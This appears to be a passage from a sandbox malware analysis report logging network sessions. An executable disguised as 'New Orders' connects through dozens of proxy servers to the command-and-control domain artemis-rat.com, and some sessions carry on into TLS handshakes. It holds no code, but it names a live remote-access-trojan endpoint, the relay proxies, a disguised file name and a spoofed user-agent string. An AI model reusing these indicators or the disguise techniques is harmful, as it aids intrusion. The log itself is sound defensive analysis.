                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.810808897 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        313192.168.2.950813212.31.100.13841537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.529577971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        314192.168.2.9507961.179.148.9556367672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.533466101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.850943089 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        315192.168.2.95082789.31.143.12807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.533571005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.844731092 CET307INHTTP/1.1 400 Bad Request
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 150
                                                                                        Connection: close
                                                                                        Server: UD Forwarding 3.1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        316192.168.2.95085272.210.221.19741457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.534004927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        317192.168.2.95089467.43.227.227100497672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.534337044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        318192.168.2.950855174.77.111.19741457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.534370899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        319192.168.2.95085172.195.34.60273917672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.534426928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        320192.168.2.950107146.59.18.246409757672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.535165071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        321192.168.2.950111103.167.68.7780807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.535820961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        322192.168.2.950169177.234.194.1589997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.535890102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.066508055 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        323192.168.2.95086552.67.10.183807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.548340082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.869571924 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0
                                                                                        Mar 11, 2024 16:16:41.889219999 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 59 f0 c7 52 15 54 51 d0 28 d2 22 1f b8 b4 15 1e 03 f0 d1 1f 70 d0 d5 80 cb 1a 1e 73 3c 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                        Data Ascii: e YRTQ("ps<*,+0/$#('=<5/Uartemis-rat.com#
                                                                                        Mar 11, 2024 16:16:42.210603952 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 2e 35 0c 87 21 1b 55 be f0 f8 c0 a8 1b da 03 36 b7 94 2e 78 db ac 1f dd 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                        Data Ascii: =9.5!U6.xDOWNGRD0000*H010Uartemis-rat.com0240311145335Z260311145335Z010Uartemis-rat.com0"0*H0t71MAQ
                                                                                        Mar 11, 2024 16:16:42.299443007 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 a6 b9 c6 be 65 57 cd ad 76 7d bc 3a ee 6a d1 db ff eb f8 a6 8a 08 08 37 16 e2 c2 c2 bf 18 27 46 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 54 ac 03 45 db 84 12 fd f1 f8 f0 79 54 d6 49 d9 e0 f2 3f c5 5d
                                                                                        Data Ascii: %! eWv}:j7'F(TEyTI?]JOD1Zs
                                                                                        Mar 11, 2024 16:16:42.619430065 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 b8 d6 3d 32 8b 1d 14 4c 26 4d 88 2c 1e 84 ab a4 d8 28 8a 17 5b 50 d4 39 28 aa 17 ae 15 f1 d7 4c 8c 0f 9c 15 f3 95 fb a3
                                                                                        Data Ascii: (=2L&M,([P9(L


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        324192.168.2.950926198.23.229.203156737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.548402071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        325192.168.2.950956162.159.241.5807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.548671961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.710391998 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        326192.168.2.95095147.88.3.1980807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.548721075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.719439983 CET309INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.23.4
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 157
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.4</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        327192.168.2.95086943.131.245.216156737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.548769951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        328192.168.2.95092245.196.148.6754327672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.548847914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.765244007 CET308INHTTP/1.1 407 Proxy Authentication Required
                                                                                        Server: FaaS v1.3-20220203-7fa38bd5af
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                        Content-Length: 65
                                                                                        Proxy-Authenticate: Basic realm="Proxy"
                                                                                        Connection: close
                                                                                        Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64
                                                                                        Data Ascii: HTTP authorization error: ip auth failed, no credentials provided


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        329192.168.2.95085791.148.127.16280807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.549068928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        330192.168.2.950449192.252.208.70142827672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.549655914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        331192.168.2.95076565.1.244.232807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.553936958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.945998907 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0
                                                                                        Mar 11, 2024 16:16:41.947340965 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 59 64 12 6c 91 a1 f0 6b 03 a1 71 f1 55 8d 78 ac 5f 4a 07 60 f0 7c 6a 15 00 ae 98 ab 1a 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                        Data Ascii: e YdlkqUx_J`|j*,+0/$#('=<5/Uartemis-rat.com#
                                                                                        Mar 11, 2024 16:16:42.341763020 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 d8 22 da 04 89 45 3e 57 4a d7 e5 96 f6 ee 44 5d 8b 2a 1b 0d e1 37 cb 2b 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                        Data Ascii: =9"E>WJD]*7+DOWNGRD0000*H010Uartemis-rat.com0240311144532Z260311144532Z010Uartemis-rat.com0"0*H0!y^.s=
                                                                                        Mar 11, 2024 16:16:42.379240036 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 84 b3 b2 1a 40 72 25 11 f0 6b 1d 30 d6 59 f5 e1 5b af f9 03 45 3a df 85 fa 58 56 75 b7 c0 0b 0c 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 01 55 29 86 c5 8b 5b 23 8e 64 05 ac b4 37 e0 77 a9 9f 58 7d 38
                                                                                        Data Ascii: %! @r%k0Y[E:XVu(U)[#d7wX}8T^]4
                                                                                        Mar 11, 2024 16:16:42.769718885 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 53 07 f3 89 07 d0 ec bf 71 90 3a 86 ba 93 66 36 55 c7 08 65 7c 86 f9 64 a0 ce cd c0 67 3e 59 36 f2 0f 16 d6 4c 61 ff 8b
                                                                                        Data Ascii: (Sq:f6Ue|dg>Y6La


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        332192.168.2.95089547.242.234.237807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.554783106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        333192.168.2.950900174.64.199.7941457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.554883003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        334192.168.2.950975132.148.128.88203177672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.555779934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.007411957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.507469893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.664028883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.664266109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:47.668240070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:49.773541927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:53.773356915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:01.773673058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        335192.168.2.950901121.159.146.251807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.556426048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        336192.168.2.95106647.236.85.1134437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.556499004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        337192.168.2.950931138.121.15.2299997672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.556569099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        338192.168.2.95089985.25.177.53588517672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.556653023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.241929054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.242064953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.046598911 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:48.742105961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.445382118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
